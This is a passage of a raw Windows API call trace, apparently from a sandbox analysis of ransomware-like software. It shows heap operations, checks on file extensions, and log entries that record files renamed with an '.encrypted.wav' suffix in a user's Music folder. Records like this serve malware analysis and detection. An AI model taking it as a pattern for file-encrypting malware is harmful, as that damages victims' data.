RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0038.909] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0038.909] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0038.909] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.909] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="av", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.909] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.909] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0038.909] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0038.909] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0038.909] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0038.909] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0038.909] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0038.909] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0038.909] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0038.909] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0038.909] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0038.910] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0038.910] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0038.910] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0038.910] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0038.910] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0038.910] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0038.910] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0038.910] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0038.910] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0038.910] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0038.910] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0038.910] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0038.910] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0038.910] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab0010 [0038.910] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0038.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0038.910] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0038.910] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x2704, lpOverlapped=0x0) returned 1 [0038.910] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0038.910] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x2704, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0038.911] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0038.911] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0038.911] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab0010 | out: hHeap=0x770000) returned 1 [0038.911] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0038.911] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0038.911] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\ZaH-2jgJS1xf027TWp.encrypted.wav\r\n", cchWideChar=90, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 90 [0038.911] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x5a) returned 0x87aa40 [0038.911] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\ZaH-2jgJS1xf027TWp.encrypted.wav\r\n", cchWideChar=90, lpMultiByteStr=0x87aa40, cbMultiByte=90, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\ZaH-2jgJS1xf027TWp.encrypted.wav\r\n", lpUsedDefaultChar=0x0) returned 90 [0038.911] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0038.911] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87a9d8 [0038.911] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87aa40 | out: hHeap=0x770000) returned 1 [0038.911] WriteFile (in: hFile=0x128, lpBuffer=0x87a9d8*, nNumberOfBytesToWrite=0x59, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x87a9d8*, lpNumberOfBytesWritten=0x6aee3c*=0x59, lpOverlapped=0x0) returned 1 [0038.911] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87a9d8 | out: hHeap=0x770000) returned 1 [0038.911] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0038.911] CloseHandle (hObject=0x128) returned 1 [0038.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0038.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0038.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0038.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0038.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0038.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0038.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0038.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0038.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0038.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0038.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0038.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0038.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0038.912] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0038.912] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0038.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0038.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0038.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0038.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0038.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d8600 | out: hHeap=0x770000) returned 1 [0038.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0038.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0038.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0038.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0038.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0038.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0038.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0038.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0038.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0038.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0038.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0038.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0038.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0038.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0038.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0038.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0038.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0038.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0038.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0038.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0038.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0038.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0038.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0038.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0038.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0038.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0038.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0038.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0038.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0038.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0038.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0038.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0038.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0038.914] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0038.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0038.914] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0038.914] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0038.914] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0038.914] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0038.914] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0038.914] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0038.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0038.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0038.914] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0038.914] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af3f8 [0038.914] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0038.914] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0038.914] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0038.914] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0038.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0038.914] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0038.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0038.914] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889b08 [0038.914] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0038.914] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0038.914] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0038.914] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0038.914] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0038.914] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0038.914] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0038.914] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0038.914] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0038.915] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0038.915] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0038.915] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0038.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0038.915] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0038.915] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0038.915] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0038.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0038.915] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0038.915] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0038.915] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0038.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0038.915] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0038.915] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0038.915] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0038.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0038.915] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0038.915] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0038.915] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0038.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0038.915] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0038.915] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0038.915] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0038.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0038.915] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0038.915] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0038.915] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0038.915] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0038.915] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0038.916] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0038.916] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0038.916] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0038.916] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0038.916] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0038.916] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0038.916] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0038.916] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0038.916] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0038.916] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0038.916] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0038.916] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0038.916] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0038.916] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0038.916] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0038.916] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0038.916] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0038.916] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0038.916] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0038.916] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0038.916] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0038.916] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0038.916] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0038.916] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0038.916] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0038.916] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0038.916] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0038.916] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0038.916] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0038.916] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0038.916] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0038.916] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0038.917] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0038.917] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0038.917] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0038.917] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0038.917] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0038.917] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0038.917] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0038.917] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0038.917] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0038.917] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0038.917] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5bb8 [0038.917] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0038.917] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0038.917] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0038.917] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0038.917] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0038.917] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0038.917] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0038.917] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0038.917] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0038.917] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0038.917] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0038.917] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0038.917] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0038.917] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0038.917] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0038.917] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0038.917] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0038.917] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0038.917] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0038.917] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0038.917] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0038.918] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0038.918] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0038.918] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | 